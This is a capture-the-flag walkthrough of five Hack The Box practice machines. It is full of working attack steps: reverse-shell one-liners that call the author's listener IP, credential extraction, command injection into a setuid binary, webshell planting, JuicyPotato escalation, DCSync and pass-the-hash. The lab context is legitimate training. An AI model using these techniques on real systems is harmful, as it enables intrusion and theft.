HTB_Start_Point

Using HTB to pick up a few more Windows pentesting techniques.

Archetype

Windows

Port scan

nmap -sV -sT -Pn 10.10.10.27

Nmap scan report for 10.10.10.27
Host is up (0.51s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Exploitation

Start by enumerating the SMB service with smbmap:

smbmap -H 10.10.10.27
[+] IP: 10.10.10.27:445 Name: 10.10.10.27

Supplying an arbitrary username gets a guest session:

smbmap -H 10.10.10.27 -u test
[+] Guest session   IP: 10.10.10.27:445  Name: 10.10.10.27
        Disk        Permissions   Comment
        ----        -----------   -------
        ADMIN$      NO ACCESS     Remote Admin
        backups     READ ONLY
        C$          NO ACCESS     Default share
        IPC$        READ ONLY     Remote IPC

An empty password is enough to log in:

smbclient \\\\10.10.10.27\\backups -U test
Enter WORKGROUP\test's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jun 4 12:10:59 2021
.. D 0 Fri Jun 4 12:10:59 2021
prod.dtsConfig AR 609 Mon Jan 20 20:23:02 2020
schtasks.txt A 174006 Fri Jun 4 12:05:57 2021
services.txt A 6370 Fri Jun 4 12:10:59 2021

10328063 blocks of size 4096. 8165400 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
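The connection string is the real prize in that file. As an added example (not part of the original writeup), here is a small parser that pulls user, password and server out of every ConnectionString property in a .dtsConfig, so a whole backups share can be swept instead of reading each file by eye. The embedded file is a constructed copy of the one shown above; the ODBC spellings (uid/pwd/server) it also accepts are an assumption about other files, not something this box had.

```python
"""Pull credentials out of SSIS .dtsConfig files.

Added example, not code from the original writeup.  The sample below is a
constructed copy of the prod.dtsConfig recovered from the backups share.
"""
import xml.etree.ElementTree as ET

SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value;' into a dict.  OLE DB keys are case-insensitive, so lower-case them."""
    pairs = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        key, _, val = part.partition("=")
        pairs[key.strip().lower()] = val.strip()
    return pairs


def extract_credentials(xml_text):
    """Return one record per Configuration whose Path targets a ConnectionString and that carries a password."""
    root = ET.fromstring(xml_text)
    found = []
    for cfg in root.iter("Configuration"):
        path = cfg.get("Path", "")
        if "ConnectionString" not in path:
            continue
        value_el = cfg.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        kv = parse_connection_string(value_el.text)
        # "User ID"/"Password" are the OLE DB names; "uid"/"pwd"/"server" are the ODBC ones (assumed, for other files).
        password = kv.get("password") or kv.get("pwd")
        if password is None:
            continue
        found.append({
            "path": path,
            "user": kv.get("user id") or kv.get("uid"),
            "password": password,
            "data_source": kv.get("data source") or kv.get("server"),
            # Persist Security Info=True tells the provider to keep handing the password back to callers.
            "persist_security_info": kv.get("persist security info", "").lower() == "true",
        })
    return found


if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_DTSCONFIG):
        print("{path}: {user} / {password} -> {data_source}".format(**cred))
```

Point it at every *.dtsConfig pulled from a share (smbmap's -R listing makes them easy to spot); any hit with Persist Security Info=True is a password that the application itself will happily disclose to anything that can query the connection object.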

This yields the MSSQL credentials ARCHETYPE\sql_svc:M3g4c0rp123.

Log in with impacket's mssqlclient.py:

https://github.com/SecureAuthCorp/impacket

Once in, xp_cmdshell gives OS command execution as the SQL Server service account. mssqlclient's enable_xp_cmdshell helper runs sp_configure 'show advanced options' and sp_configure 'xp_cmdshell' (each followed by RECONFIGURE) for you; changing those server options requires sysadmin-level rights on the instance, which sql_svc evidently has, as the output below confirms.

python mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27  -windows-auth
Impacket v0.9.23.dev1+20210528.195232.25c62f65 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output

--------------------------------------------------------------------------------

archetype\sql_svc

NULL

SQL> xp_cmdshell type C:\users\sql_svc\desktop\user.txt
output

--------------------------------------------------------------------------------

3e7b102e78218e935bf3f4951fec21a3

Privilege escalation

C:\users\sql_svc\appdata is a hidden directory, so listing it needs dir /a. Inside it, PSReadline's ConsoleHost_history.txt holds the user's PowerShell command history, a standard place to look for credentials:

SQL> xp_cmdshell type C:\users\sql_svc\appdata\roaming\microsoft\windows\powershell\psreadline\ConsoleHost_history.txt
output

--------------------------------------------------------------------------------

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

exit

NULL

The PowerShell history leaks the administrator credentials:

Archetype\administrator:MEGACORP_4dm1n!!

impacket's psexec.py then gives an administrative shell (it uploads a service binary to ADMIN$ and starts it, so the shell actually runs as SYSTEM):

python psexec.py archetype/administrator@10.10.10.27
Impacket v0.9.23.dev1+20210528.195232.25c62f65 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file OFvCNrQJ.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service SMtb on 10.10.10.27.....
[*] Starting service SMtb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\users\administrator\desktop\root.txt
b91ccec3305e98240082d4474b848528

Trying to run commands as administrator without psexec: a bumpy ride

On Windows, runas can run a command as another user:
runas /savecred /user:administrator whoami
but the password cannot be supplied as an argument:

runas /savecred /user:administrator whoami
Attempting to start whoami as user "DOMAIN\administrator" ...
Enter the password for administrator:

The password has to be entered interactively, so this cannot be used to escalate directly from the non-interactive MSSQL shell.

The sanur tool can feed the password in from the command line:

runas /savecred /user:administrator whoami | sanur.exe password

But the next problem follows immediately: runas apparently does not run the command in the current cmd window but in a new one, so nothing is echoed back into the MSSQL shell.

So I tried writing the command's output to a file instead:

runas /savecred /user:administrator "cmd /c whoami > C:\1" | sanur.exe password

This worked locally but not on the target (sigh).


Oopsie

Linux

Port scan

nmap -sV -sT -Pn 10.10.10.28

Nmap scan report for 10.10.10.28
Host is up (0.68s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

The front page's source loads this script:

<script src="/cdn-cgi/login/script.js"></script>

which gives away the path /cdn-cgi/login.

That path is the login page. Logging in requires the Administrator password from the previous box, which is a bit of a trap:
admin:MEGACORP_4dm1n!!

Requesting /cdn-cgi/login/admin.php?content=uploads returns "This action require super admin rights."
The cookie is user=34322; role=admin, so the server decides authorization from values the client controls: knowing the super admin's id and role string is enough to escalate.

/cdn-cgi/login/admin.php?content=accounts&id=1 shows the admin's account details, and since the id parameter is not access-controlled (an IDOR), it can be enumerated to find the super admin:


import requests

# Walk the accounts page by id using the ordinary admin cookie;
# stop at the first page that mentions "super" (the super admin account).
session = requests.Session()
cookies = {"user": "34322", "role": "admin"}
for account_id in range(0, 999):
    url = "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id={}".format(account_id)
    res = session.get(url, cookies=cookies)
    if "super" in res.text:
        print(account_id)
        break

id 30 returns:

Access ID   Name          Email
86575       super admin   superadmin@megacorp.com

In Burp Suite, change the cookie to Cookie: user=86575; role=super admin and request /cdn-cgi/login/admin.php?content=uploads again.
Uploading a weevely shell then gives code execution.
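The escalation works because the server reads the role straight from a cookie the client can edit. As an added example (not code from the original writeup or from the target application), the vulnerable check is shown next to a hardened version that binds user id and role into one HMAC-signed token, which the client cannot alter without the server key. The key, the `session` cookie name and the `user|role|tag` layout are assumptions made for this example.

```python
"""Forgeable role cookie (as observed on Oopsie) versus an HMAC-signed session token.

Added example, not code from the writeup or the target application.  The
hardened functions assume a server-side key and a 'session' cookie carrying
'user|role|hex(hmac)'; both are assumptions made for this illustration.
"""
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # in practice loaded from config; never reaches the client


def parse_cookie(header):
    """'user=34322; role=admin' -> {'user': '34322', 'role': 'admin'}"""
    out = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            out[name] = value
    return out


def is_super_admin_vulnerable(cookie_header):
    """What the observed application does: believes the client-supplied role."""
    return parse_cookie(cookie_header).get("role") == "super admin"


def issue_session(user_id, role, key=SERVER_KEY):
    """Server side, at login: sign 'user|role' so neither field can be edited without the key."""
    payload = "{}|{}".format(user_id, role)
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "|" + tag


def is_super_admin_hardened(cookie_header, key=SERVER_KEY):
    """Verify the tag before trusting anything in the token; any malformation is a rejection."""
    parts = parse_cookie(cookie_header).get("session", "").split("|")
    if len(parts) != 3:
        return False
    user_id, role, tag = parts
    expected = hmac.new(key, "{}|{}".format(user_id, role).encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return False
    return role == "super admin"


def demo():
    # 34322/admin is the account we log in as; 86575/super admin is what the enumeration found.
    forged = "user=86575; role=super admin"
    legit = "session=" + issue_session(86575, "super admin")
    tampered = "session=" + issue_session(34322, "admin").replace("|admin|", "|super admin|")
    return {
        "vulnerable_accepts_forgery": is_super_admin_vulnerable(forged),
        "hardened_accepts_legit": is_super_admin_hardened(legit),
        "hardened_rejects_tampered": is_super_admin_hardened(tampered),
        "hardened_rejects_forgery": is_super_admin_hardened(forged),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Signing stops tampering, but the cleaner fix is to keep only an opaque session id in the cookie and look the role up server-side on every request, so a role change takes effect without waiting for the token to expire.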

Privilege escalation

Reverse shell with python3 back to my machine:

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.16.51',9996));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
-------
nc -lvnp 9996

Get a tty
(this seems to be needed to obtain a terminal session, otherwise the later user switch does not work)

python3 -c 'import pty;pty.spawn("/bin/bash")'

The account page evidently runs SQL queries, so look for the database configuration:

cat /var/www/html/cdn-cgi/login/db.php

<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

This gives the credentials robert:M3g4C0rpUs3r!

Switch to robert with them:

su robert
M3g4C0rpUs3r!
cat /home/robert/user.txt

f2c74ee8db7983851ab2a96a44eb7981

Look for SUID binaries:

find / -user root -perm -4000 -print 2>/dev/null

One of them is interesting:

/usr/bin/bugtracker

It is setuid root, executable by the bugtracker group, and robert is a member of that group:

ls -la /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker

id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

Decompiled in IDA:

int __cdecl main(int argc, const char **argv, const char **envp)
{
__uid_t v3; // eax
const char *v4; // rax
char v7[24]; // [rsp+10h] [rbp-20h] BYREF
unsigned __int64 v8; // [rsp+28h] [rbp-8h]

v8 = __readfsqword(0x28u);
printf("%s", "\n------------------\n: EV Bug Tracker :\n------------------\n\n");
printf("Provide Bug ID: ");
__isoc99_scanf("%s", v7);
printf("%s", "---------------\n\n");
v3 = geteuid();
setuid(v3);
v4 = (const char *)concat("cat /root/reports/", v7);
system(v4);
putchar(10);
return __readfsqword(0x28u) ^ v8;
}
  • the user's input is read into v7 with scanf("%s") (a 24-byte stack buffer with no length limit, so there is a plain overflow too, but the injection below is simpler)
  • v7 is appended to "cat /root/reports/" and the result assigned to v4
  • v4 is passed to system(); setuid(geteuid()) has already made the real uid root as well, so the shell runs fully as root

Command injection

Payload: ;cat$IFS$9/root/root.txt

scanf("%s") stops at whitespace, so the payload cannot contain a literal space. $IFS expands to the shell's field separator (space, tab and newline by default), and $9 is an empty positional parameter that terminates the variable name. Here the next character is /, which cannot be part of a variable name anyway, so $IFS alone would also work; $IFS$9 is simply the habitual form that also covers payloads where a letter or digit follows.

./bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: ;cat$IFS$9/root/root.txt
---------------

cat: /root/reports/: Is a directory
af13b0bee69f8a877c3faf667f7beacf
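To make the injection and its fix concrete, an added example that is not code from the writeup or from the bugtracker binary: build_command() mirrors what the decompiled main() does (string concatenation into system()), shell_words() asks /bin/sh itself how the payload splits into words, and run_hardened() is what the program should have done. REPORT_DIR is an assumption, a temporary directory standing in for /root/reports/ so the example runs as an unprivileged user.

```python
"""The bugtracker command injection, reproduced and fixed.

Added example, not code from the writeup or the binary.  REPORT_DIR stands
in for /root/reports/ so this runs without root.
"""
import os
import re
import subprocess
import tempfile

REPORT_DIR = tempfile.mkdtemp()                 # assumption: stands in for /root/reports/
BUG_ID_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")  # what a bug id is allowed to look like


def build_command(bug_id):
    """Vulnerable: exactly the string the decompiled code hands to system()."""
    return "cat /root/reports/" + bug_id


def shell_words(payload):
    """Ask /bin/sh how it splits the payload after expansion: printf '[%s]' prints one [] per word."""
    out = subprocess.run(["/bin/sh", "-c", "printf '[%s]' " + payload],
                         capture_output=True, text=True, check=True)
    return out.stdout


def run_hardened(bug_id, report_dir=REPORT_DIR):
    """Fixed: allowlist the identifier, build the path, and never involve a shell."""
    if not BUG_ID_RE.fullmatch(bug_id):
        raise ValueError("invalid bug id")
    path = os.path.join(report_dir, bug_id)
    # Defence in depth: the resolved path must still be inside the report directory.
    real_dir = os.path.realpath(report_dir)
    if os.path.commonpath([os.path.realpath(path), real_dir]) != real_dir:
        raise ValueError("path escapes report directory")
    result = subprocess.run(["cat", path], capture_output=True, text=True, check=True)
    return result.stdout


def demo():
    with open(os.path.join(REPORT_DIR, "1234"), "w") as fh:
        fh.write("report 1234\n")
    results = {
        "vulnerable_command": build_command(";cat$IFS$9/root/root.txt"),
        # $IFS becomes whitespace and $9 is empty, so two words come out although no space was typed
        "ifs_words": shell_words("cat$IFS$9/root/root.txt"),
        "legit": run_hardened("1234"),
    }
    for payload in (";cat$IFS$9/root/root.txt", "../etc/passwd", "1234 x"):
        try:
            run_hardened(payload)
            results[payload] = "accepted"
        except ValueError as exc:
            results[payload] = str(exc)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(repr(key), "->", repr(value))
```

Note that the shell in the vulnerable binary is /bin/sh via system(), not bash; dash does not drop privileges on its own, and even bash would not help once setuid(geteuid()) has made both uids root, which is why the one-line payload above reads root.txt directly.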

Vaccine

Linux

Port scan

nmap -sV -sT -Pn 10.10.10.46

Nmap scan report for 10.10.10.46
Host is up (0.59s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

"The credentials ftpuser / mc@F1l3ZilL4 can be used to login to the FTP server." – official writeup

"Try logging in to the box's FTP service with the FTP credentials ftpuser/mc@F1l3ZilL4 obtained on the previous box."
https://blog.csdn.net/qianxiaoyiran311/article/details/105988795

So the FTP credentials are:

ftpuser:mc@F1l3ZilL4

Log in to the FTP service:

ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2533 Feb 03 2020 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.23 secs (10.7549 kB/s)

Crack the password-protected backup.zip:

fcrackzip backup.zip -D -p /usr/share/wordlists/rockyou.txt -u

PASSWORD FOUND!!!!: pw == 741852963

index.php from the archive:

<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
$_SESSION['login'] = "true";
header("Location: dashboard.php");
}
}
?>

Crack the MD5 hash:

echo -n "2cb42f8734ea607eefed3b70af13bbd3" > passwd
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt passwd
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789 (?)
1g 0:00:00:00 DONE (2021-06-05 19:16) 33.33g/s 3340Kp/s 3340Kc/s 3340KC/s shunda..pogimo
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session complete

After logging in to the web app there is a search function.
sqlmap's --os-shell gets a shell through it:

sqlmap -u "http://10.10.10.46/dashboard.php?search=1" --os-shell

sqlmap's shell is awkward to use, so spawn a proper reverse shell from it:

rm /tmp/y;mkfifo /tmp/y;cat /tmp/y|/bin/bash -i 2>&1|nc 10.10.16.51 9996 >/tmp/y
------
nc -lvnp 9996

Privilege escalation

Check the database configuration:

cat /var/www/html/dashboard.php

$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

Credentials:

postgres:P@s5w0rd!

The same password works for SSH as the postgres system account:

ssh postgres@10.10.10.46
P@s5w0rd!

Check sudo rights:

sudo -l
[sudo] password for postgres: P@s5w0rd!

Matching Defaults entries for postgres on vaccine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

vi privilege escalation

Run the permitted vi through sudo, then :shell spawns a shell as root:

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:shell

cat /root/root.txt
dd6e058e814260bc70e9bbdef2715849

About the FTP credentials "from the previous box"

In the spirit of learning by doing, I checked the open ports on the previous box, Oopsie:

netstat -antlp
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 1205/mysqld
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 800/systemd-resolve
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1120/sshd
tcp 0 235 10.10.10.28:41042 10.10.16.51:9996 ESTABLISHED 2166/python3
tcp6 0 0 :::80 :::* LISTEN 1260/apache2
tcp6 0 0 :::22 :::* LISTEN 1120/sshd
tcp6 0 0 10.10.10.28:80 10.10.16.51:58936 ESTABLISHED 1963/apache2

There is no FTP service, so the order of the boxes has probably been changed.

Personally I don't agree with this design of leaking sensitive information on a different box.
More precisely, a leak via another box should not be the only attack chain.
When such a chain is given, a second, independent one should be provided as well.
It does make a series of boxes, or a multi-layer scenario, feel more connected,
but once the order changes it becomes rather self-defeating, and nothing was adjusted afterwards.
The missing user.txt is just icing on this box's 2.7 rating.


Shield

Windows

Port scan

nmap -sV -sT -Pn 10.10.10.29

Nmap scan report for 10.10.10.29
Host is up (0.38s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Directory scan

The path /wordpress was found.
(Honestly I didn't scan at all; the network was too slow, so I just read the writeup.)

Exploitation

wpscan --url http://10.10.10.29/wordpress/ -e u

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

The password from the previous box, P@s5w0rd!, works again:
admin:P@s5w0rd!
Infuriating.

After logging in, edit a plugin's code and write a shell straight into it,
then request /wordpress/wp-content/plugins/mesmerize-companion/src/Companion.php.

Privilege escalation

Connect to the webshell with AntSword, upload nc and get a reverse shell back:

nc64.exe -e C:\windows\system32\cmd.exe 10.10.16.51 9996
-------
nc -lvnp 9996
systeminfo

Host Name: SHIELD
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30000-00299-AA303
Original Install Date: 2/4/2020, 12:58:01 PM
System Boot Time: 6/5/2021, 8:21:33 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 753 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,015 MB
Virtual Memory: In Use: 1,416 MB
Page File Location(s): C:\pagefile.sys
Domain: MEGACORP.LOCAL
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.29
[02]: fe80::98f9:2cd0:ff27:3fbc
[03]: dead:beef::98f9:2cd0:ff27:3fbc
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Windows Server 2016 Standard with no hotfixes installed (Hotfix(s): N/A above). Escalate with JuicyPotato, the Rotten Potato variant: it still works on this build (the technique was closed in Windows Server 2019 / Windows 10 1809) and only needs the impersonation privilege that is checked below.
https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

Write a .bat that spawns a reverse shell:

echo start C:\temp\nc64.exe -e cmd.exe 10.10.16.51 9995 > C:\temp\shell.bat

Out of Linux habit I had wrapped the text in double quotes, but cmd's echo writes the quotes into the file literally, which is why the escalation kept failing at first.

Check the token privileges:

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled

If SeImpersonatePrivilege is held, JuicyPotato can be run with -t t;
if SeAssignPrimaryTokenPrivilege is held, with -t u;
if both are held, -t *;
if neither, it cannot escalate.
https://blog.csdn.net/god_zzZ/article/details/106334702

Then pick a CLSID for Windows Server 2016 Standard from the project's list:

JuicyPotato.exe -t t -p C:\temp\shell.bat -l 6666 -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
------
nc -lvnp 9995

type c:\users\administrator\desktop\root.txt
6e9a9fdc6f64e410a68b847bb4b404fa

Pathfinder

Attacking a domain controller is a bit beyond my knowledge.

Port scan

nmap -sV -sT -p 1-10000 10.10.10.30

Nmap scan report for 10.10.10.30
Host is up (0.57s latency).
Not shown: 9987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-06-08 13:22:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Use the credentials sandra:Password1234! from the previous box to enumerate AD – official writeup

bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30

neo4j console
bloodhound

Zip the JSON files and import them into BloodHound.
BloodHound kept crashing on my Kali for no obvious reason, so I ran it on Windows instead;
neo4j's listen address had to be changed from the default loopback to an IP reachable from the Windows machine.

The analysis query "Find Principals with DCSync Rights"
shows that the user SVC_BES has GetChanges and GetChangesAll.

"With both GetChanges and GetChangesAll privileges in BloodHound, you may perform a dcsync attack to get the password hash of an arbitrary principal using mimikatz"
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#getchanges-getchangesall

DCSync (a mimikatz feature, also implemented by impacket's secretsdump.py) does not read ntds.dit or use the Volume Shadow Copy service: it impersonates a domain controller and asks the real DC to replicate account secrets over the MS-DRSR replication RPC (DRSGetNCChanges). That is exactly what the GetChanges/GetChangesAll rights (Replicating Directory Changes / Replicating Directory Changes All) permit, which is why this single account is enough. (Cf. 《内网安全攻防》 p. 296.)

So if svc_bes's credentials can be obtained, a DCSync attack is possible.
First try to get a hash for svc_bes; GetNPUsers.py with -no-pass only succeeds because the account does not require Kerberos pre-authentication, so the KDC hands out an AS-REP encrypted with the account's key:

python GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30

[*] Getting TGT for svc_bes
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:9b7a931e1152a4631d23173e921373ee$7282d47fdf6ebddcd09f8233636ee97c971b39333ded23097d3fb59c4fb1dfbd772cb3b08b8a8f40a69f69a07f242e0ee2520878b707ab9769208ba2bd6faa76c0a79b39384ef588651127c3164fff013b53d0968d4047dad049b46747b52629c6c9b92427fc7bd6dca13a923bdb833ca9273c2018b605a9eeb0c24005b5ba8988b76952db3a31f6b14f165bd0613e7130ee1bc93cb9a0e4f7a018cbf3913b935778e860d3236d2763b56d871e236e98ea041bbb5b15ebf3138ca16214a758b24194d968320151e58d09a89c2d08e4576ab789076cba4096b4fb328965611663cbe588eafd5bf19af71293701d8a220e

Crack the AS-REP hash:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Sheffield19 ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)

I first tried psexec to log in directly, but got an access-denied error (psexec needs a writable admin share, which this account cannot reach):
python psexec.py megacorp.local/svc_bes@10.10.10.30

Log in over WinRM instead (5985/tcp is open):

evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19
type C:\users\svc_bes\desktop\user.txt
b05fb166688a8603d970c6d033f637f1

DCSync attack

secretsdump.py -dc-ip 10.10.10.30 megacorp.local/svc_bes:Sheffield19@10.10.10.30
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::

Pass the hash to log in as Administrator:

python psexec.py megacorp.local/administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
type c:\users\administrator\desktop\root.txt
ee613b2d048303e5fd4ac6647d944645

